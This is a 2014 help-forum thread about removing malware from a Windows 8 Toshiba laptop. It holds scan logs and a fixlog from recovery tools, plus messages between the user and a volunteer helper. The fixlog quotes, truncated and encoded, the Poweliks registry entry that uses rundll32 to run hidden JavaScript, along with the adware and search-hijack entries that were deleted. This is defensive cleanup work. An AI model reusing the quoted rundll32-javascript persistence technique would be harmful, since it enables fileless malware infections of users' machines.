CustomCLSID: HKU\S-1-5-21-3754358886-4043612072-4009104627-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
S3 COMSysApp; %SystemRoot%\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} [X]
BHO-x32: Toolbar BHO -> {7c8f8fe5-9785-4f74-bcf8-895ef9752d97} -> C:\PROGRA~2\GAMING~2\bar\1.bin\gtbar.dll No File
SearchScopes: HKCU - {31090377-0740-419E-BEFC-A56E50500D5B} URL = 
SearchScopes: HKCU - {C043058C-5F2C-4C42-AB2F-8787D95BF238} URL = 
SearchScopes: HKLM - {31090377-0740-419E-BEFC-A56E50500D5B} URL = http://speedial.com/results.php?f=4&q={searchTerms}&a=spd_wnzp_14_23_ie&cd=2XzuyEtN2Y1L1QzuyBtDyDyE0DtBtCtCtCzytB0AyD0EyCyBtN0D0Tzu0SzzzzyCtN1L2XzutBtFtBtDtFtCzytFtDtN1L1CzutCyEtBzytDyD1V1TtN1L1G1B1V1N2Y1L1Qzu2SyEzy0EtC0FzytAyCtG0E0FyEtAtG0DtCyBtCtGtAyByEtDtGyC0CyDtAyE0BzyyEtB0AzztB2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyDtC0B0E0E0Bzz0FtG0C0DyCtDtGtDzzzz0FtGzz0DtBzztGyDzztDtDyEyC0D0DtDyC0FyB2Q&cr=1057173731&ir=
HKU\S-1-5-21-3754358886-4043612072-4009104627-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll => C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll File Not Found
HKLM-x32\...\Run: [GamingWonderland EPM Support] => "C:\PROGRA~2\GAMING~2\bar\1.bin\gtmedint.exe" T8EPMSUP.DLL,S

C:\PROGRA~2\GAMING~2

EmptyTemp:
*****************

"HKU\S-1-5-21-3754358886-4043612072-4009104627-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key Deleted Successfully.
COMSysApp => Service deleted successfully.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7c8f8fe5-9785-4f74-bcf8-895ef9752d97}" => Key deleted successfully.
"HKCR\Wow6432Node\CLSID\{7c8f8fe5-9785-4f74-bcf8-895ef9752d97}" => Key deleted successfully.
"HKCU\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{31090377-0740-419E-BEFC-A56E50500D5B}" => Key deleted successfully.
"HKCR\CLSID\{31090377-0740-419E-BEFC-A56E50500D5B}" => Key not found.
"HKCU\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{C043058C-5F2C-4C42-AB2F-8787D95BF238}" => Key deleted successfully.
"HKCR\CLSID\{C043058C-5F2C-4C42-AB2F-8787D95BF238}" => Key not found.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{31090377-0740-419E-BEFC-A56E50500D5B}" => Key deleted successfully.
"HKCR\CLSID\{31090377-0740-419E-BEFC-A56E50500D5B}" => Key not found.
"HKU\S-1-5-21-3754358886-4043612072-4009104627-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key not found.
"HKU\S-1-5-21-3754358886-4043612072-4009104627-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.
"C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll" => Value Data removed successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\GamingWonderland EPM Support => value deleted successfully.
"C:\PROGRA~2\GAMING~2" => File/Directory not found.
EmptyTemp: => Removed 2.1 GB temporary data.


The system needed a reboot. 

==== End of Fixlog ====

Malbytes:

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 10/21/2014
Scan Time: 3:48:12 PM
Logfile: 
Administrator: Yes

Version: 2.00.3.1025
Malware Database: v2014.10.21.11
Rootkit Database: v2014.10.21.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 8
CPU: x64
File System: NTFS
User: Jeremy and Heidi

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 317053
Time Elapsed: 23 min, 54 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)


#12 schrauber

schrauber

    Mr.Mechanic


  • Malware Response Team
  • 24,794 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Munich,Germany
  • Local time:01:47 AM

Posted 29 October 2014 - 02:58 AM

Hi JeremyAndrew,

Marius is not available at the moment, so I will work with you from now on. Please post back with a fresh FRST logfile and tell me how the system is running.
regards,
schrauber

Posted Image
Posted Image

If I've not posted back within 48 hrs., feel free to send a PM with your topic link. Thank you!

If I have helped you then please consider donating to continue the fight against malware Posted Image

#13 JeremyAndrew

JeremyAndrew
  • Topic Starter

  • Members
  • 12 posts
  • OFFLINE
  •  
  • Local time:05:47 PM

Posted 01 November 2014 - 11:06 AM

Hi.  Powershell stopped crashing all the time.  Still have a lot of corrupted windows files - can't open Windows store, can't print from Internet Explorer, can't update to newer browser, etc.  But these are residual damage, I think.  I don't think anything bad is running anymore.

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 01-11-2014
Ran by Jeremy and Heidi (administrator) on TOSHIBA_LAPTOP on 01-11-2014 08:57:13
Running from C:\Users\Jeremy and Heidi\Downloads
Loaded Profile: Jeremy and Heidi (Available profiles: Jeremy and Heidi)
Platform: Windows 8 (X64) OS Language: English (United States)
Internet Explorer Version 10
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgrsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Emsisoft GmbH) C:\Program Files (x86)\Emsisoft Anti-Malware\a2service.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
() C:\Program Files (x86)\Toshiba\Password Utility\GFNEXSrv.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Windows\System32\dasHost.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe
(TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\Teco\TecoService.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\Hotkey\TCrdMain_Win8.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\Teco\TecoResident.exe
(TOSHIBA Corporation) C:\Program Files (x86)\Toshiba\System Setting\TSleepSrv.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgui.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Emsisoft GmbH) C:\Program Files (x86)\Emsisoft Anti-Malware\a2guard.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TOSHIBA Service Station\ToshibaServiceStation.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TPHM\TPCHSrv.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TPHM\TPCHWMsg.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TOSHIBA Service Station\TMachInfo.exe
(Microsoft Corporation) C:\Program Files (x86)\Windows Live\Mail\wlmail.exe
(Microsoft Corporation) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\splwow64.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [] => [X]
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12936848 2012-07-13] (Realtek Semiconductor)
HKLM\...\Run: [SRS Premium Sound HD] => C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel_64.exe [2170784 2012-07-27] (SRS Labs, Inc.)
HKLM\...\Run: [TCrdMain] => C:\Program Files\TOSHIBA\Hotkey\TCrdMain_Win8.exe [2608040 2012-08-13] (TOSHIBA Corporation)
HKLM\...\Run: [TecoResident] => C:\Program Files\TOSHIBA\Teco\TecoResident.exe [169896 2012-08-13] (TOSHIBA Corporation)
HKLM\...\Run: [TosWaitSrv] => C:\Program Files\TOSHIBA\TPHM\TosWaitSrv.exe [356776 2012-07-11] (TOSHIBA Corporation)
HKLM\...\Run: [TSleepSrv] => C:\Program Files (x86)\TOSHIBA\System Setting\TSleepSrv.exe [1548952 2012-08-04] (TOSHIBA Corporation)
HKLM\...\Run: [TODDMain] => C:\Program Files (x86)\TOSHIBA\System Setting\TODDMain.exe [213136 2012-08-04] ()
HKLM-x32\...\Run: [ToshibaAppPlace] => C:\Program Files (x86)\Toshiba\Toshiba App Place\ToshibaAppPlace.exe [552960 2010-09-23] (Toshiba)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [642216 2012-08-08] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2015\avgui.exe [3593744 2014-09-05] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-04-23] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-05-15] (Apple Inc.)
HKLM-x32\...\Run: [Nikon Message Center 2] => C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe [570880 2013-12-27] (Nikon Corporation)
HKLM-x32\...\Run: [emsisoft anti-malware] => c:\program files (x86)\emsisoft anti-malware\a2guard.exe [4873248 2014-10-13] (Emsisoft GmbH)
Startup: C:\Users\Jeremy and Heidi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2010 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2010 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://toshiba13.msn.com
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = http://mystart.toshiba.com
HKCU\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://facebook.com/
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://toshiba13.msn.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = http://mystart.toshiba.com
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://mystart.toshiba.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://toshiba13.msn.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = http://mystart.toshiba.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://mystart.toshiba.com
SearchScopes: HKLM - DefaultScope {C043058C-5F2C-4C42-AB2F-8787D95BF238} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MATBJS
SearchScopes: HKLM - {C043058C-5F2C-4C42-AB2F-8787D95BF238} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MATBJS
SearchScopes: HKLM-x32 - DefaultScope {C043058C-5F2C-4C42-AB2F-8787D95BF238} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MATBJS
SearchScopes: HKLM-x32 - {C043058C-5F2C-4C42-AB2F-8787D95BF238} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MATBJS
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 10.0.0.1

FireFox:
========
FF Plugin: @java.com/DTPlugin,version=10.67.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.67.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.20125.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @java.com/DTPlugin,version=10.25.2 -> C:\windows\SysWOW64\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Jeremy and Heidi\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)

Chrome: 
=======

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 a2AntiMalware; C:\Program Files (x86)\Emsisoft Anti-Malware\a2service.exe [4816568 2014-10-13] (Emsisoft GmbH)
R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe [3364368 2014-09-05] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe [293448 2014-09-05] (AVG Technologies CZ, s.r.o.)
R2 GFNEXSrv; C:\Program Files (x86)\Toshiba\Password Utility\GFNEXSrv.exe [156672 2011-10-13] () [File not signed]
S2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe [89352 2014-09-15] (Hewlett-Packard Company)
R3 KeyIso; C:\Windows\SysWOW64\keyiso.dll [43520 2012-07-25] (Microsoft Corporation)
S3 Netlogon; C:\Windows\SysWOW64\netlogon.dll [634368 2012-07-25] (Microsoft Corporation)
S3 StorSvc; C:\Windows\SysWOW64\storsvc.dll [18432 2012-07-25] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [16056 2014-09-15] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R3 a2acc; C:\PROGRAM FILES (X86)\EMSISOFT ANTI-MALWARE\a2accx64.sys [71472 2014-05-12] (Emsisoft GmbH)
R1 A2DDA; C:\Program Files (x86)\Emsisoft Anti-Malware\a2ddax64.sys [26176 2013-03-28] (Emsisoft GmbH)
R1 a2injectiondriver; C:\Program Files (x86)\Emsisoft Anti-Malware\a2dix64.sys [45208 2013-09-30] (Emsisoft GmbH)
R1 a2util; C:\Program Files (x86)\Emsisoft Anti-Malware\a2util64.sys [23088 2014-05-12] (Emsisoft GmbH)
R2 APXACC; C:\Windows\system32\DRIVERS\appexDrv.sys [199008 2012-06-23] (AppEx Networks Corporation)
R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdW86.sys [98472 2012-07-17] (Advanced Micro Devices)
S0 Avgboota; C:\Windows\System32\DRIVERS\avgboota.sys [20496 2013-09-04] (AVG Technologies CZ, s.r.o.)
R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [153368 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [247576 2014-07-24] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [190744 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [243480 2014-08-20] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [313624 2014-07-18] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [123672 2014-08-06] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [31512 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgwfpa; C:\Windows\system32\DRIVERS\avgwfpa.sys [273176 2014-07-18] (AVG Technologies CZ, s.r.o.)
R3 cleanhlp; C:\Program Files (x86)\Emsisoft Anti-Malware\cleanhlp64.sys [57024 2013-12-04] (Emsisoft GmbH)
S3 MBAMSwissArmy; C:\windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-10-27] (Malwarebytes Corporation)
R2 PEGAGFN; C:\Program Files (x86)\Toshiba\Password Utility\PEGAGFN.sys [14344 2009-09-11] (PEGATRON)
S3 RTL8192Ce; C:\Windows\system32\DRIVERS\rtwlane.sys [1496720 2012-08-13] (Realtek Semiconductor Corporation                           )
R3 RTWlanE; C:\Windows\system32\DRIVERS\rtwlane.sys [1496720 2012-08-13] (Realtek Semiconductor Corporation                           )
R3 Thotkey; C:\Windows\System32\drivers\Thotkey.sys [28632 2012-07-31] (Windows (R) Win 7 DDK provider)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-01 08:57 - 2014-11-01 08:57 - 00000000 ____D () C:\Users\Jeremy and Heidi\Downloads\FRST-OlderVersion
2014-10-30 22:22 - 2014-10-30 22:22 - 00359864 _____ () C:\windows\system32\FNTCACHE.DAT
2014-10-30 16:17 - 2014-09-29 15:49 - 00705480 _____ (Adobe Systems Incorporated) C:\windows\SysWOW64\FlashPlayerApp.exe
2014-10-30 16:17 - 2014-09-29 15:49 - 00104904 _____ (Adobe Systems Incorporated) C:\windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-10-28 11:56 - 2014-10-28 11:56 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Roaming\AVS4YOU
2014-10-28 10:46 - 2014-10-28 11:37 - 356025256 _____ () C:\Users\Jeremy and Heidi\Downloads\mp4.mp4
2014-10-22 22:40 - 2014-10-23 08:27 - 00380416 _____ () C:\Users\Jeremy and Heidi\o2ik1mvb.exe
2014-10-21 18:46 - 2014-10-21 18:46 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Roaming\AVG2015
2014-10-21 18:44 - 2014-10-21 18:44 - 00001015 _____ () C:\Users\Public\Desktop\AVG 2015.lnk
2014-10-21 18:41 - 2014-10-22 19:31 - 00000000 ____D () C:\ProgramData\AVG2015
2014-10-21 17:08 - 2014-10-21 21:07 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Local\Avg2015
2014-10-17 10:07 - 2014-10-31 11:19 - 00001186 _____ () C:\Users\Jeremy and Heidi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Emsisoft Anti-Malware Guard.lnk
2014-10-16 16:14 - 2014-10-16 16:14 - 00001666 _____ () C:\Users\Jeremy and Heidi\Desktop\fixlist.txt
2014-10-16 12:18 - 2014-10-16 12:18 - 00000069 _____ () C:\windows\wininit.ini
2014-10-16 12:15 - 2014-10-16 12:15 - 00001318 _____ () C:\Users\Jeremy and Heidi\Desktop\Revo Uninstaller.lnk
2014-10-16 12:15 - 2014-10-16 12:15 - 00000000 ____D () C:\Program Files (x86)\VS Revo Group
2014-10-16 12:14 - 2014-10-16 12:14 - 02623656 _____ (VS Revo Group Ltd.) C:\Users\Jeremy and Heidi\Desktop\revosetup.exe
2014-10-15 23:11 - 2014-09-12 22:29 - 00079360 _____ (Microsoft Corporation) C:\windows\system32\packager.dll
2014-10-15 23:11 - 2014-09-12 21:02 - 00068096 _____ (Microsoft Corporation) C:\windows\SysWOW64\packager.dll
2014-10-15 23:11 - 2014-09-02 19:48 - 00510464 _____ (Microsoft Corporation) C:\windows\SysWOW64\rastls.dll
2014-10-15 23:11 - 2014-09-02 19:21 - 00585728 _____ (Microsoft Corporation) C:\windows\system32\rastls.dll
2014-10-15 23:11 - 2014-07-11 17:02 - 00478352 _____ () C:\windows\SysWOW64\locale.nls
2014-10-15 23:11 - 2014-07-11 17:00 - 00478352 _____ () C:\windows\system32\locale.nls
2014-10-15 23:11 - 2014-07-08 15:32 - 01539584 _____ (Microsoft Corporation) C:\windows\system32\storagewmi.dll
2014-10-15 23:11 - 2014-07-08 15:32 - 00340480 _____ (Microsoft Corporation) C:\windows\system32\defragsvc.dll
2014-10-15 23:11 - 2014-07-08 15:30 - 01220608 _____ (Microsoft Corporation) C:\windows\SysWOW64\storagewmi.dll
2014-10-15 23:11 - 2014-07-06 22:53 - 01125376 _____ (Microsoft Corporation) C:\windows\system32\mstsc.exe
2014-10-15 23:11 - 2014-07-06 22:52 - 03248128 _____ (Microsoft Corporation) C:\windows\system32\rdpcorets.dll
2014-10-15 23:11 - 2014-07-06 22:52 - 00724992 _____ (Microsoft Corporation) C:\windows\system32\termsrv.dll
2014-10-15 23:11 - 2014-07-06 22:52 - 00300544 _____ (Microsoft Corporation) C:\windows\system32\winsta.dll
2014-10-15 23:11 - 2014-07-06 22:52 - 00263680 _____ (Microsoft Corporation) C:\windows\system32\wcmsvc.dll
2014-10-15 23:11 - 2014-07-06 22:52 - 00074752 _____ (Microsoft Corporation) C:\windows\system32\wcmcsp.dll
2014-10-15 23:11 - 2014-07-06 22:51 - 05982208 _____ (Microsoft Corporation) C:\windows\system32\mstscax.dll
2014-10-15 23:11 - 2014-07-06 21:01 - 01049600 _____ (Microsoft Corporation) C:\windows\SysWOW64\mstsc.exe
2014-10-15 23:11 - 2014-07-06 21:01 - 00233472 _____ (Microsoft Corporation) C:\windows\SysWOW64\winsta.dll
2014-10-15 23:11 - 2014-07-06 21:00 - 05095424 _____ (Microsoft Corporation) C:\windows\SysWOW64\mstscax.dll
2014-10-15 23:11 - 2014-07-06 20:59 - 00269312 _____ (Microsoft Corporation) C:\windows\SysWOW64\aaclient.dll
2014-10-15 23:11 - 2014-07-04 03:52 - 00328000 _____ (Microsoft Corporation) C:\windows\system32\Drivers\volsnap.sys
2014-10-15 23:11 - 2014-07-02 18:59 - 01824784 _____ (Microsoft Corporation) C:\windows\system32\ntdll.dll
2014-10-15 23:11 - 2014-07-02 17:30 - 01408952 _____ (Microsoft Corporation) C:\windows\SysWOW64\ntdll.dll
2014-10-15 23:11 - 2014-06-28 00:01 - 00096768 _____ (Microsoft Corporation) C:\windows\SysWOW64\dwmapi.dll
2014-10-15 23:11 - 2014-06-27 23:57 - 00209920 _____ (Microsoft Corporation) C:\windows\system32\profsvc.dll
2014-10-15 23:11 - 2014-06-27 23:56 - 00117248 _____ (Microsoft Corporation) C:\windows\system32\dwmapi.dll
2014-10-15 23:11 - 2014-06-25 00:09 - 00733184 _____ (Microsoft Corporation) C:\windows\system32\win32spl.dll
2014-10-15 23:11 - 2014-06-25 00:07 - 01023488 _____ (Microsoft Corporation) C:\windows\system32\localspl.dll
2014-10-15 23:11 - 2014-06-17 16:27 - 02032640 _____ (Microsoft Corporation) C:\windows\SysWOW64\d3d10warp.dll
2014-10-15 23:11 - 2014-06-17 16:23 - 02238464 _____ (Microsoft Corporation) C:\windows\system32\d3d10warp.dll
2014-10-15 23:11 - 2014-06-11 07:47 - 02842112 _____ (Microsoft Corporation) C:\windows\system32\WMVDECOD.DLL
2014-10-15 23:11 - 2014-06-10 21:40 - 02620928 _____ (Microsoft Corporation) C:\windows\SysWOW64\WMVDECOD.DLL
2014-10-15 23:11 - 2014-06-10 15:44 - 01403896 _____ (Microsoft Corporation) C:\windows\system32\winload.efi
2014-10-15 23:11 - 2014-05-29 16:31 - 00323072 _____ (Microsoft Corporation) C:\windows\SysWOW64\schannel.dll
2014-10-15 23:11 - 2014-05-29 16:03 - 00419328 _____ (Microsoft Corporation) C:\windows\system32\schannel.dll
2014-10-15 23:11 - 2014-02-04 03:57 - 01271664 _____ (Microsoft Corporation) C:\windows\system32\winload.exe
2014-10-15 23:10 - 2014-07-11 21:41 - 00008704 _____ (Microsoft Corporation) C:\windows\system32\KBDRUM.DLL
2014-10-15 23:10 - 2014-07-11 21:41 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDYAK.DLL
2014-10-15 23:10 - 2014-07-11 21:41 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDTAT.DLL
2014-10-15 23:10 - 2014-07-11 21:41 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDRU1.DLL
2014-10-15 23:10 - 2014-07-11 21:41 - 00006656 _____ (Microsoft Corporation) C:\windows\system32\KBDRU.DLL
